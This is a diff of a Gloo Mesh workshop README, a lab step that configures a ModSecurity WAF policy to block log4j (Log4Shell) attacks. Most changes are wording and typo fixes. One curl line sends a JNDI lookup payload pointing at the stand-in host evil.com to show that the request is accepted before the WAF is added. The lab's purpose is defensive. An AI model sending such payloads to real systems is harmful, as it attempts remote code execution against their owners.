solo-io/solo-cop/workshops/gloo-mesh-demo/README.md

 kubectl apply -f tracks/06-api-gateway/workspace-settings.yaml --context $MGMT
 ```

-### 1. Add a web application firewall (WAF)
+#### Web Application Firewall (WAF)

 Gloo Mesh Gateway utilizes OWASP ModSecurity to add WAF features into the ingress gateway.
 Not only can you enable the [OWASP Core Rule Set](https://owasp.org/www-project-modsecurity-core-rule-set/) easily, but also you can enable many other advanced features to protect your applications.

 In this section of the lab, take a quick look at how to prevent the `log4j` exploit that was discovered in late 2021.
 For more details, you can review the [Gloo Edge blog](https://www.solo.io/blog/block-log4shell-attacks-with-gloo-edge/) that this implementation is based on.

-**Before you begin**

 1. Refer to following diagram from Swiss CERT to learn how the `log4j` attack works.
 Note that a JNDI lookup is inserted into a header field that is logged.
 ![log4j exploit](./images/log4j_attack.png)

-2. Confirm that a bad JNDI request currently succeeds.
+2. Confirm that a malicious JNDI request currently succeeds.
 Note the `200` success response.
 Later, you create a WAF policy to block such requests.

 ```sh
 curl -ik -X GET -H "User-Agent: \${jndi:ldap://evil.com/x}" http://$HTTP_GATEWAY_ENDPOINT
 ```

-**WAF policy**
-With the Gloo Mesh WAF policy custom resource, you can create reusable policies for ModSecurity.

-3. Review the `log4j` WAF policy and the frontend route table.
+3. With the Gloo Mesh WAF policy custom resource, you can create reusable policies for ModSecurity.
+Review the `log4j` WAF policy and the frontend route table.
 Note the following settings.

   * In the route table, the frontend route has the label `waf: "true"`.
-The WAF policy applies to routes with this same lable.
+The WAF policy applies to routes with this same label.
   * In the WAF policy config, the default core rule set is disabled.
 Instead, a custom rule set is created for the `log4j` attack.

 ```yaml